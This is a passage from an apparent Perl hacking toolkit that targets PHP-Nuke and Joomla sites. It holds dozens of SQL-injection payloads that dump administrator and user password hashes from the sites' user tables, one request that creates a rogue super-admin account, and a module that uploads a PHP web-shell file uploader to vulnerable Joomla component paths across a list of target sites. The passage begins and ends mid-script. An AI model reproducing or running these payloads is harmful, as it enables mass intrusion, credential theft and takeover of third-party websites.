  533.                         "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/",
  534.                         "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors",
  535.                         "modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users",
  536.                         "modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/",
  537.                         "modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors",
  538.                         "modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala",
  539.                         "index.php?&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
  540.                         "modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*",
  541.                         "admin.php?op=AddAuthor&add_aid=x0p0x&add_name=God&add_pwd=cool&add_email=bugs@victima&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
  542.                         "modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/",
  543.                         "modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2",
  544.                         "modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2",
  545.                         "modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors",
  546.                         "modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5",
  547.                         "modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors",
  548.                         "modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201",
  549.                         "modules.php?op=modload&name=books&file=index&req=view_cat&cid=-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201",
  550.                         "modules.php?name=Sections&op=viewarticle&artid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2",
  551.                         "modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
  552.                         "modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*","modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
  553.                         "modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2",
  554.                         "modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2",
  555.                         "modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2",
  556.                         "modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
  557.                         "modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202",
  558.                         "modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2",
  559.                         "modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors",
  560.                         "modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors",
  561.                         "modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*");
  562. system('cls');
  563. print "PhpNuke SQl Scanner\n";
  564. print "Enter Target (http://www.target.il/)\n";
  565. print ">>";
  566. my $nuketarget = <>;
  567. chomp $nuketarget;
  568.  
  569. foreach $Nuke(@Nuke){
  570. my $URLL = $nuketarget.$Nuke;
  571. my $Sourcee = get $URLL;
  572. die "Can not get $URLL" unless defined $URLL;
  573. if ($Sourcee =~/([0-9a-f]{32})/) { $Messagee ="Vulnerability FOUND";}
  574. else { $Messagee = "NOT FOUND Vulnerability";}
  575. print "$URLL     =>    $Messagee\n";
  576. print "\n \n \n \n \t \t \t \t FINISH ";
  577. open (TEXT, '>>Nuke.txt');
  578. print TEXT "\n$URLL   =>   $Messagee \n\n";
  579. close (TEXT);
  580. }
  581. }
  582. if($targett eq '6')
  583. {
  584. system('cls');
  585. system('title Base64 Decoder');
  586. print color("green"),"Enter String Base64 you want Decode:";
  587.                                                         $decode=<STDIN>;
  588.                                                         chomp $decode;
  589.                                                         $zeb=decode_base64($decode);
  590.                                                         print " Decoded success : \n\n $zeb \n";
  591. }
  592. if($targett eq '5')
  593. {
  594. system('cls');
  595. system('title Base64 Encoder');
  596. print color("green"),"Base64 Encoder\n";
  597. print " Enter String:";
  598.                                                 $hash=<STDIN>;
  599.                                                 chomp $hash;
  600.                                                 $t=encode_base64($hash);
  601.                                                 print "Encoded Succes : \n\n $t \n";
  602.  
  603.  
  604. }
  605. if($targett eq '1')
  606. {
  607. system('cls');
  608. print color("green"),"\n[1] Joomla RCI Scanner\n";
  609. print color("green"), "[2] Joomla SQL Scanner\n";
  610. print color("green"), "[3] Joomla LFI Scanner\n";
  611. print color("green"), "[4] Joomla RFI Scanner\n";
  612. print color("green"), "[5] Joomla JCE Vuln\n";
  613. print color("green"), "\nChoose Number :";
  614. my $c = <>;
  615. chomp $c;
  616. if($c eq '1')
  617. {  #Script Original Coded by M-A Labz
  618. system('cls');
  619. system('title Joomla Component RCI scanner');
  620. print color("bold red"),"\n[+]Joomla Components RCI Exploits Scanner \n";
  621. print color 'reset';
  622. print color("green"),"[+] Enter File (List of site file) : ";
  623. print color 'reset';
  624. $file=<STDIN>;
  625. chomp($file);
  626. open (file, "<$file") || die "[-] Can't open the List of site file !";
  627. my @file = <file>;
  628. close file;
  629. foreach $webs (@file)
  630. {
  631. chomp $webs;
  632. $site = $webs;
  633. print color("green"), "[+] Scanning $site\n";
  634. print color 'reset';
  635. @paths=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
  636. foreach $path(@paths)
  637. {
  638. $site_vul = "http://".$site."".$path."?name=tt7.php";
  639. $data = "php code";
  640. $data.= ' <title>Evil Upload</title> ';
  641. $data.= ' <h1>Evil Upload</h1> ';
  642. $data.= '<?php ';
  643. $data.= "echo '<b><br><br>'.php_uname().'<br></b>'; ";
  644. $data.= 'echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\'; ';
  645. $data.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; ';
  646. $data.= "if( \$_POST['_upl'] == \"Upload\" ) { ";
  647. $data.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } ";
  648. $data.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } ";
  649. $data.= " } ";
  650. $data.= "?>";
  651. $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $data);
  652. if ($res->is_success){
  653. print color("green"), "[+] $site is vul\n";
  654. print color 'reset';
  655. @vulns=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/tt7.php','/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/tt7.php','/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/tt7.php','/administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php','/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/tt7.php','/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/tt7.php');
  656. foreach $vul(@vulns)
  657. {
  658. $url = "http://".$site. $vul;
  659. $request = HTTP::Request->new(GET=>$url);
  660. $useragent = LWP::UserAgent->new();
  661. $response = $useragent->request($request);
  662. if ($response->content=~m/<title>Evil Upload<\/title>/g){
  663. print color("green"), "[+] Found => $url\n\n";
  664. print color 'reset';
  665. open(BEN,">>result-$site.txt");
  666. print BEN "$url\n";
  667. close(BEN);
  668. }else{
  669. print "[-] Not Found \n";
  670. }
  671. }
  672. }
  673. }
  674. }
  675. }
  676. if($c eq '2')
  677. {
  678. system('cls');
  679. system('title Joomla Sql Scanner');
  680. ###xpl###
  681. $com_jeajaxeventcalendar="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
  682. $com_storedirectory="UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users";
  683. $com_annuaire="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
  684. $com_maianmedia="+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--";
  685. $com_alfurqan15x="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
  686. $com_markt="+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--";
  687. $com_sponsorwall="+and+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+from+jos_users--";
  688. $com_flipwall="+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--";
  689. $jedirectory="+1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),4,5,6,7,8,9,10,11+from+jos_users+where+id=userid--";
  690. $com_ezautos="+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--";
  691. $com_arash="+and 1=0 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users";
  692. $com_taxes="+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--";
  693. $com_vat="+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--";
  694. $com_blogs="/**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--";
  695. $com_gr="+union+select+1,concat(username,0x3a,password)+from+jos_users--";
  696. $com_simpleshop="UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--";
  697. $com_youtube="union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--";
  698. $com_joomdle="-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz";
  699. $com_itaromry="?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+";
  700. $com_iproperty="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
  701. $com_huruhelpdesk="/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--";
  702. $com_jomtube="+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
  703. $com_spa="%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--";
  704. $com_staticxt="+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users";
  705. $com_ybggal="+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--";
  706. $com_quran="/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--";
  707. $com_konsultasi="/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--";
  708. $com_newsfeeds="%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--";
  709. $wapmain="+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--";
  710. $com_abc="+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--";
  711. $com_joomradio="+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--";
  712. $com_jtm="/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search";
  713. $com_gbufacebook="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz";
  714. $com_manager="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
  715. $com_jp_jobs="/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--";
  716. $com_sermonspeaker="/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/";
  717. $com_jdrugstopic="+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--";
  718. $com_mv_restaurantmenumanager="+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users";
  719. $com_articles="+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—-";
  720. $com_dcs_flashgames="+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--";
  721. $com_bidding="+UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--";
  722. $com_acteammember="+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en";
  723. $com_acstartseite="+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&#9001;=de";
  724. $com_productbook="+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--";
  725. $com_yelp="+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17+FROM+jos_users--";
  726. $com_dms="+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--";
  727. $com_jbpublishdownfp="+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users";
  728. $com_casino="+union+all+select+1,username,password,4,5+from+jos_users/*";
  729. $com_doqment="/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--";
  730. $com_alfresco="/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--";
  731. $com_countries="/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users";
  732.  
  733.  
  734.  
  735.  
  736. print color("green"),"\nTarget page: http://wwww.site.com/ : ";
  737. chomp(my $target=<STDIN>);
  738.  
  739. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  740. $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
  741. $host = $target . "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-999 .$com_jeajaxeventcalendar.";
  742. $res = $b->request(HTTP::Request->new(GET=>$host));
  743. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
  744. print "[*] Results : CHECK : \n";
  745. print "Joomla JE Ajax Event Component (com_jeajaxeventcalendar) SQL Injection Vulnerability ! \n\n";
  746. }
  747. else{print "\n[-] Error\n";
  748. }
  749.  
  750. $host = $target . "/index.php?option=com_storedirectory&task=view&id=-999 .$com_storedirectory.";
  751. $res = $b->request(HTTP::Request->new(GET=>$host));
  752. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
  753. print "[*] Results : CHECK : \n";
  754. print "Joomla Component (com_storedirectory) SQL Injection Vulnerability ! \n\n";
  755. }
  756. else{print "\n[-] Error\n";
  757. }
  758.  
  759. $host = $target . "/index.php?option=com_annuaire&view=annuaire&type=cat&id=-999 .$com_annuaire.";
  760. $res = $b->request(HTTP::Request->new(GET=>$host));
  761. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  762. print "[*] Results : CHECK : \n";
  763. print "Joomla (com_annuaire) SQL Injection Vulnerability ! \n\n";
  764. }
  765. else{print "\n[-] Error\n";
  766. }
  767.  
  768. $host = $target . "/index.php?option=com_maianmedia&view=music&cat=-999 .$com_maianmedia.";
  769. $res = $b->request(HTTP::Request->new(GET=>$host));
  770. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  771. print "[*] Results : CHECK : \n";
  772. print "Joomla Component (com_maianmedia) SQL Injection Vulnerability ! \n\n";
  773. }
  774. else{print "\n[-] Error\n";
  775. }
  776.  
  777. $host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999 .$com_alfurqan15x.";
  778. $res = $b->request(HTTP::Request->new(GET=>$host));
  779. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  780. print "[*] Results : CHECK : \n";
  781. print "Joomla Component (com_alfurqan15x) SQL Injection Vulnerability ! \n\n";
  782. }
  783. else{print "\n[-] Error\n";
  784. }
  785.  
  786. $host = $target . "/index.php?option=com_markt&page=show_category&catid=999 .$com_markt.";
  787. $res = $b->request(HTTP::Request->new(GET=>$host));
  788. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  789. print "[*] Results : CHECK : \n";
  790. print "Joomla Component (com_markt) SQL Injection Vulnerability ! \n\n";
  791. }
  792. else{print "\n[-] Error\n";
  793. }
  794.  
  795. $host = $target . "/index.php?option=com_sponsorwall&controller=sponsorwall&catid=9999 .$com_sponsorwall.";
  796. $res = $b->request(HTTP::Request->new(GET=>$host));
  797. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  798. print "[*] Results : CHECK : \n";
  799. print "Joomla Component (com_sponsorwall) SQL Injection Vulnerability ! \n\n";
  800. }
  801. else{print "\n[-] Error\n";
  802. }
  803.  
  804. $host = $target . "/index.php?option=com_flipwall&controller=flipwall&catid=999 .$com_flipwall.";
  805. $res = $b->request(HTTP::Request->new(GET=>$host));
  806. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  807. print "[*] Results : CHECK : \n";
  808. print "Joomla Component (com_flipwall) SQL Injection Vulnerability ! \n\n";
  809. }
  810. else{print "\n[-] Error\n";
  811. }
  812.  
  813. $host = $target . "/index.php?option=com_jedirectory&view=item&catid=999 .$jedirectory.";
  814. $res = $b->request(HTTP::Request->new(GET=>$host));
  815. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  816. print "[*] Results : CHECK : \n";
  817. print "Joomla JE Directory SQL Injection Vulnerability ! \n\n";
  818. }
  819. else{print "\n[-] Error\n";
  820. }
  821.  
  822. $host = $target . "/index.php?option=com_ezautos&Itemid=999&id=1&task=helpers&firstCode=999 .$com_ezautos.";
  823. $res = $b->request(HTTP::Request->new(GET=>$host));
  824. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  825. print "[*] Results : CHECK : \n";
  826. print "Joomla Component (com_ezautos) SQL Injection Vulnerability ! \n\n";
  827. }
  828. else{print "\n[-] Error\n";
  829. }
  830.  
  831. $host = $target . "/index.php?option=com_arash&id=999 .$com_arash.";
  832. $res = $b->request(HTTP::Request->new(GET=>$host));
  833. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  834. print "[*] Results : CHECK : \n";
  835. print "Joomla Component (com_arash) SQL Injection Vulnerability ! \n\n";
  836. }
  837. else{print "\n[-] Error\n";
  838. }
  839.  
  840. $host = $target . "/index.php?option=com_taxes&id=-999 .$com_taxes.";
  841. $res = $b->request(HTTP::Request->new(GET=>$host));
  842. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  843. print "[*] Results : CHECK : \n";
  844. print "Joomla Component (com_taxes) SQL Injection Vulnerability ! \n\n";
  845. }
  846. else{print "\n[-] Error\n";
  847. }
  848.  
  849. $host = $target . "/index.php?option=com_vat&id=-999 .$com_vat.";
  850. $res = $b->request(HTTP::Request->new(GET=>$host));
  851. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  852. print "[*] Results : CHECK : \n";
  853. print "Joomla Component (com_vat) SQL Injection Vulnerability ! \n\n";
  854. }
  855. else{print "\n[-] Error\n";
  856. }
  857.  
  858. $host = $target . "/index.php?option=com_blogs&task=details&b_id=999 .$com_blogs.";
  859. $res = $b->request(HTTP::Request->new(GET=>$host));
  860. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  861. print "[*] Results : CHECK : \n";
  862. print "Joomla Component (com_blogs) SQL Injection Vulnerability ! \n\n";
  863. }
  864. else{print "\n[-] Error\n";
  865. }
  866.  
  867. $host = $target . "/index.php?option=com_blogs&task=details&b_id=-999 .$com_gr.";
  868. $res = $b->request(HTTP::Request->new(GET=>$host));
  869. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  870. print "[*] Results : CHECK : \n";
  871. print "Joomla Component (com_gr) SQL Injection Vulnerability ! \n\n";
  872. }
  873. else{print "\n[-] Error\n";
  874. }
  875.  
  876. $host = $target . "/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=-999 .$com_simpleshop.";
  877. $res = $b->request(HTTP::Request->new(GET=>$host));
  878. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  879. print "[*] Results : CHECK : \n";
  880. print "Joomla Component (com_simpleshop) SQL Injection Vulnerability ! \n\n";
  881. }
  882. else{print "\n[-] Error\n";
  883. }
  884.  
  885. $host = $target . "/index.php?option=com_youtube&id_cate=999 .$com_youtube.";
  886. $res = $b->request(HTTP::Request->new(GET=>$host));
  887. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  888. print "[*] Results : CHECK : \n";
  889. print "Joomla Component (com_youtube) SQL Injection Vulnerability ! \n\n";
  890. }
  891. else{print "\n[-] Error\n";
  892. }
  893.  
  894. $host = $target . "/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=.$com_joomdle.";
  895. $res = $b->request(HTTP::Request->new(GET=>$host));
  896. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  897. print "[*] Results : CHECK : \n";
  898. print "Joomla Component (com_joomdle) SQL Injection Vulnerability ! \n\n";
  899. }
  900. else{print "\n[-] Error\n";
  901. }
  902.  
  903. $host = $target . "/index.php?option=com_itarmory&view=guildmembers&Itemid=.$com_itarmory.";
  904. $res = $b->request(HTTP::Request->new(GET=>$host));
  905. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  906. print "[*] Results : CHECK : \n";
  907. print "Joomla Component (com_itarmory) SQL Injection Vulnerability ! \n\n";
  908. }
  909. else{print "\n[-] Error\n";
  910. }
  911.  
  912. $host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999 .$com_iproperty.";
  913. $res = $b->request(HTTP::Request->new(GET=>$host));
  914. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  915. print "[*] Results : CHECK : \n";
  916. print "Joomla Component (com_iproperty) SQL Injection Vulnerability ! \n\n";
  917. }
  918. else{print "\n[-] Error\n";
  919. }
  920.  
  921. $host = $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=999 .$com_huruhelpdesk.";
  922. $res = $b->request(HTTP::Request->new(GET=>$host));
  923. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  924. print "[*] Results : CHECK : \n";
  925. print "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability ! \n\n"
  926. }
  927. else{print "\n[-] Error\n";
  928. }
  929.  
  930. $host = $target . "/index.php?view=videos&type=member&user_id=-999 .$com_jomtube.";
  931. $res = $b->request(HTTP::Request->new(GET=>$host));
  932. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  933. print "[*] Results : CHECK : \n";
  934. print "Joomla Component (com_jomtube) SQL Injection Vulnerability ! \n\n"
  935. }
  936. else{print "\n[-] Error\n";
  937. }
  938.  
  939. $host = $target . "/index.php?option=com_spa&view=spa_read_more&pid=-999 .$com_spa.";
  940. $res = $b->request(HTTP::Request->new(GET=>$host));
  941. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  942. print "[*] Results : CHECK : \n";
  943. print "Joomla Component (com_spa) SQL Injection Vulnerability ! \n\n"
  944. }
  945. else{print "\n[-] Error\n";
  946. }
  947.  
  948. $host = $target . "/index.php?option=com_staticxt&staticfile=test.php&id=-999 .$com_staticxt.";
  949. $res = $b->request(HTTP::Request->new(GET=>$host));
  950. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  951. print "[*] Results : CHECK : \n";
  952. print "Joomla Component (com_staticxt) SQL Injection Vulnerability ! \n\n"
  953. }
  954. else{print "\n[-] Error\n";
  955. }
  956.  
  957. $host = $target . "/index.php?option=com_ybggal&Itemid=999&catid=999 .$com_ybggal.";
  958. $res = $b->request(HTTP::Request->new(GET=>$host));
  959. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  960. print "[*] Results : CHECK : \n";
  961. print "Joomla Component (com_ybggal) SQL Injection Vulnerability ! \n\n"
  962. }
  963. else{print "\n[-] Error\n";
  964. }
  965.  
  966. $host = $target . "/index.php?option=com_quran&action=viewayat&surano=999 .$com_quran.";
  967. $res = $b->request(HTTP::Request->new(GET=>$host));
  968. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  969. print "[*] Results : CHECK : \n";
  970. print "Joomla Component (com_quran) SQL Injection Vulnerability ! \n\n"
  971. }
  972. else{print "\n[-] Error\n";
  973. }
  974.  
  975. $host = $target . "/index.php?option=com_konsultasi&act=detail&sid=999 .$com_konsultasi.";
  976. $res = $b->request(HTTP::Request->new(GET=>$host));
  977. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  978. print "[*] Results : CHECK : \n";
  979. print "Joomla Component (com_konsultasi) SQL Injection Vulnerability ! \n\n"
  980. }
  981. else{print "\n[-] Error\n";
  982. }
  983.  
  984. $host = $target . "/index.php?option=com_newsfeeds&view=categories&feedid=-999 .$com_newsfeeds.";
  985. $res = $b->request(HTTP::Request->new(GET=>$host));
  986. $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
  987. print "[*] Results : CHECK : \n";
